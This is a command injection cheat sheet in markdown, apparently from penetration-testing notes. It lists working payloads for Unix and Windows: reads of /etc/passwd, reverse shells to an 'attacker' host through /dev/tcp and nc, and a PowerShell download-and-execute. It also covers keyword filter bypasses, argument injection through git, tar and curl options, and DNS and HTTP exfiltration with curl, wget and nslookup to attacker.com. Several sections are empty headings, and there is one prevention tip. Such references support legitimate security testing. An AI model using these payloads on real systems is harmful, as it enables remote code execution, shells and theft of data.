# Command Injection

## TL;DR

Execute OS commands through application inputs that reach a shell or a command-line program.

## Detection

### Basic Payloads

### Time-Based

### DNS-Based (OOB)

## Exploitation

### Unix/Linux

```text
# Read files
; cat /etc/passwd
| cat /etc/passwd
`cat /etc/passwd`

# Reverse shell
; bash -i >& /dev/tcp/attacker/4444 0>&1
; nc attacker 4444 -e /bin/bash
```

### Windows

```text
& whoami
&& whoami
| whoami
& powershell -nop -c "IEX(New-Object Net.WebClient).downloadString('http://attacker/shell.ps1')"
```
## Filter Bypasses

### Space Bypass

### Slash Bypass

### Keyword Bypass

```text
# Concatenation (the shell joins the quoted/escaped fragments back into one word)
who'a'mi
who"a"mi
w\h\o\a\m\i

# Variable expansion ($() and $@ expand to nothing, so the word survives intact)
w$()hoami
who$@ami

# Wildcards (glob expansion resolves to /bin/cat /etc/passwd)
/???/??t /???/p??s??
cat /et*/pas*
```

### Newline Injection

## Command Separators

```text
;    # Semicolon
%0a  # Newline
&    # Background
|    # Pipe
&&   # AND
||   # OR
%26  # URL-encoded &
%7c  # URL-encoded |
```
## Context-Specific

### Node.js child_process

```javascript
const { exec, execFile } = require('child_process');

// exec() - vulnerable: the string is handed to /bin/sh, so shell metacharacters
// in userInput are interpreted.
exec(`command ${userInput}`);
// Exploit: userInput = "; id"

// execFile() - no shell, so metacharacters are inert, but the value still lands
// on the program's command line and may be parsed as an option (argument injection).
execFile('command', ['--arg=' + userInput]);
```
### PHP system/exec

### Python os.system

### Ruby open()
## Argument Injection

When shell metacharacters are escaped (or no shell is used) but the input still becomes a command-line argument, the program's own option parser sees it:

```text
--help
-o /tmp/output
--config http://attacker.com/config

# Examples
curl: -o /tmp/x (write file)
tar: --use-compress-program=id
git: --upload-pack=touch${IFS}pwned
```

Prevention: pass `--` to end option parsing before any user-supplied value (where the program honours it), so the value can only be a positional operand.
## DNS/HTTP Exfiltration

```text
# DNS
; nslookup `whoami`.attacker.com
$(ping -c1 `id | base64`.attacker.com)

# HTTP
; curl http://attacker.com/?data=`id | base64`
; wget http://attacker.com/$(whoami)
```

## Common Parameters

```text
?cmd=, ?exec=, ?command=, ?execute=
?ping=, ?query=, ?code=, ?func=
?load=, ?process=, ?run=, ?payload=
```
## Tools

## Real Examples

- HackerOne #690010: Node.js exec() injection
- HackerOne #1776476: Apache Airflow Bash RCE
- HackerOne #183458: UniFi firmware download command injection